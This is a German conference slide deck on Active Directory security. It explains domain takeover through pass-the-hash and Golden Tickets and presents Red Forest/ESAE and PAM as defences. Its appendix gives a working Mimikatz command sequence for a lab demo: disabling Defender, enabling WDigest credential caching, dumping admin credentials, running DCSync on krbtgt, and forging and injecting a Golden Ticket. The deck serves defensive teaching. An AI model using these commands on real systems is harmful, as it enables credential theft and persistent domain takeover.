![Page 1: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/1.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 1
In roten und goldenen Wäldern
Active Directory Security heute
Robin Beismann
Nils Kaczenski
Einleitung: Nils (5 Min.)
![Page 2: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/2.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 2
Ellen Bogen hat Besuch
Ellen Bogen
DC, DNS,
DHCP
DC, DNS,
WINS
Exchange SQL Server SQL Server
Datei ERP Proxy
Terminal Terminal Backup Management Intranet Support
FirewallDatei, DruckDatei, Druck
?
Johannes Beere
Unsere
Domäne ist
gehackt.
![Page 3: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/3.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 3
Robin BeismannNils Kaczenski
![Page 4: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/4.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 4
![Page 5: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/5.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 5
Los geht‘s!
![Page 6: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/6.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 6
Wie übernimmt man eine Domäne?
![Page 7: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/7.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 7
Wie übernimmt man eine Domäne? Nils (5 Min.) • Grundproblem: Standardaufbau und typische Betriebsweisen machen Angriffe zu leicht • Einbruch über Sicherheitslücken oder Social Engineering • Privilege Escalation und Lateral Movement • Golden Ticket ermöglicht dauerhaften Zugriff mit beliebigen Privilegien
![Page 8: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/8.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 8
… anfassen
Golden Ticket in einer typischen Domäne
Demo: Typische Domäne, Golden Ticket: Robin (10 Min.) • Domäne typisch.zz • Aufbau zeigen
• Standardgruppen • Helpdesk = Domänen-Admins
• Mimikatz - Golden Ticket (am Client) • User ist lokaler Admin • Greift Credentials von Helpdesk-Account ab • Erzeugt mit Dom-Admin-Rechten ein Golden Ticket • Beliebige Zugriffe möglich für 10 Jahre
![Page 9: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/9.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 9
Pass the Hash und Golden Ticket: Nils (5 Min.) Kerberos-Ablauf
![Page 10: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/10.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 10
Pass the Hash und Golden Ticket: Nils (5 Min.) • Mit Pass the Hash übernimmt man ein Konto, auch ohne das Kennwort im Klartext zu kennen • Grundansatz: Credentials von hochprivilegierten Konten abgreifen
• … dadurch reicht ein einziger "echter" Angriff, der Rest geschieht innerhalb des Netz-werks
• Prinzip Pass-the-Hash
![Page 11: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/11.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 11
Pass the Hash und Golden Ticket: Nils (5 Min.) • Das Golden Ticket verlängert einen einmaligen Angriff beliebig in die Zukunft • Dauerhafter Datenabfluss bzw. dauerhafte beliebige Manipulationen • Prinzip Golden Ticket
• GT erfordert Kommunikation mit dem DC, aber keine Anmeldung
![Page 12: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/12.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 12
Wie schützt man sich davor?
Admin Tiering und Red Forest: Nils (5 Min.)
![Page 13: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/13.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 13
Admin Tiering und Red Forest: Nils (5 Min.) • Admin Tiering teilt das Netzwerk in Sicherheitszonen auf • Jeder Admin-Account ist nur für die jeweilige Ebene gut
![Page 14: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/14.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 14
Admin Tiering und Red Forest: Nils (5 Min.) • Der Red Forest separiert die Tier-0-Adminkonten noch weiter • Angriff auf den Golden Forest ermöglicht keine vollständige Übernahme, weil die Tier-0-Kon-
ten nicht im Golden Forest liegen
![Page 15: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/15.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 15
… anfassen
Red Forest (herkömmlich)
Demo: Red Forest: Robin (7 Min.) • Domänen golden.zz und red.zz • Domänenaufbau golden.zz zeigen
• Standardgruppen = leer • AD-Delegation gezielt eingerichtet • Anmeldebeschränkungen per GPO • Trust zum Red Forest
• Domänenaufbau red.zz zeigen • Schattengruppen zur Administration des Golden Forest • Schatten-Accounts • Anmeldebeschränkungen per GPO
![Page 16: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/16.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 16
Hardening: Nils (3 Min.) • Zusätzliches Hardening ist nötig, damit das Konzept aufgeht • Vor allem: Sorgfalt im Operating
![Page 17: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/17.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 17
Was geht mit Windows Server 2016?
![Page 18: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/18.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 18
PAM in Windows Server 2016: Nils (3 Min.) • PAM erweitert das Red-Forest-Prinzip • Administrative Zugriffe nur zeitgesteuert und auf Antrag
![Page 19: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/19.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 19
… anfassen
Red Forest mit Windows Server 2016
Demo: PAM: Robin (7 Min.) • Domänen pamgold.zz und pamred.zz • Aufbau mit MIM zeigen • Administrationsbeispiel zeigen
![Page 20: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/20.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 20
Ellen Bogen schützt sich vor Besuch
Ellen Bogen
• Was ist ESAE?
• Wovor schützt ESAE?
• Wer braucht ESAE?
• Wie hoch ist der Aufwand?
?!
Zusammenfassung: Nils (5 Min.) • Grundprinzipien ESAE
• Trennung privilegierter bzw. kritischer Zugriffe von der Produktionsumgebung • Hohe operative Sorgfalt - keine Ausnahmen, Bequemlichkeit muss hintenanstehen • Logging und Monitoring
• Wovor schützt ESAE? • Vor erweiterten Angriffsszenarien, die typische Schlampigkeit und Designfehler aus-
nutzen … • … die aber durch vorhandene Tools und Anleitungen längst nicht nur für High-End-
Hacker möglich sind • Wer braucht ESAE?
• Minimal: Alle Umgebungen mit erhöhtem Sicherheitsbedarf • Sinnvoll: Alle Unternehmen, die in ihrem Netzwerk etwas zu schützen haben
• Wie hoch ist der Aufwand? • Hoch bis sehr hoch • Ein sauber geplantes Design ist nötig, gefolgt von einem Redesign bestehender Umge-
bungen
![Page 21: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/21.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 21
Danke an unsere Partner!
Platinum Sponsor
Gold Sponsoren
![Page 22: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/22.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 22
Danke an unsere Partner!
Gold Sponsoren
![Page 23: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/23.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 23
![Page 24: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/24.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Anhang: Mit Mimikatz die Domäne übernehmen (Demo)
• Windows Defender abschalten (Registry) o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender o Dword DisableAntiSpyware mit Wert 1
• Credentials eines Dom-Admins von einem PC stehlen - einfache Version, um es schnell zu zeigen o Auf dem Client, angemeldet als lokaler Admin o Registry Key setzen (ab Windows 8.1 erforderlich):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD), Wert 1 • Durch diesen Key verhält sich Windows 10 wie Windows 7 oder Windows 8, wo dieser
Schritt nicht nötig ist o Neu starten o Dom-Admin anmelden, angemeldet bleiben o Fast User Switching zu einem User mit lokalen Adminrechten o CMD als Admin
• mimikatz • privilege::debug • sekurlsa::logonpasswords
o Die Hashes und das Klartextkennwort des Dom-Admins werden angezeigt • Golden Ticket erzeugen - direkter Weg (Ticket sofort nutzen)
o CMD als Dom-Admin • mimikatz • privilege::debug • lsadump::dcsync /user:krbtgt • kerberos::golden /admin:JulesWinfield /domain:lab2019.faq-
o-matic.net /id:9999 /sid:S-1-5-21-2453261737-931746725-2009616223 /krbtgt:eb75bb744c1b820e2b6d7cffcea4152c /ptt
• exit • Ticket zeigen: klist o Funktion nachweisen:
• net use x: %logonserver%\c$ • x: • Wechseln auf den DC, dort compmgmt.msc und unter "Freigegebene Ordner" die Sit-
zungen anzeigen: Sitzung für Jules Winfield wird angezeigt, obwohl es den User gar nicht gibt
• Golden Ticket speichern und später verwenden o Schritt 1: Golden Ticket erzeugen und speichern
• CMD als Dom-Admin • mimikatz • privilege::debug • lsadump::dcsync /user:krbtgt • kerberos::golden /admin:JulesWinfield /domain:lab2019.faq-
o-matic.net /id:9999 /sid:S-1-5-21-2453261737-931746725-2009616223 /krbtgt:eb75bb744c1b820e2b6d7cffcea4152c /ticket:C:\Daten\Golden-Ticket.ticket
• exit o Schritt 2: Gespeichertes Ticket verwenden
• CMD als beliebiger (!) User • net use x: %logonserver%\c$ • Schlägt fehl - Credentials eine Dom-Admins fehlen • mimikatz • kerberos::ptt C:\Daten\Golden-Ticket.ticket • exit • klist
(zeigt Ticket für Jules Winfield)
![Page 25: Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket: Robin ~ í ì Min. • Domäne typisch.zz • Aufbau zeigen • Standardgruppen](https://reader030.vdocuments.mx/reader030/viewer/2022013006/5b85a98b7f8b9ab7618e3157/html5/thumbnails/25.jpg)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
• net use x: %logonserver%\c$ • x: • Wechseln auf den DC, dort compmgmt.msc und unter "Freigegebene Ordner" die Sit-
zungen anzeigen: Sitzung für Jules Winfield wird angezeigt, obwohl es den User gar nicht gibt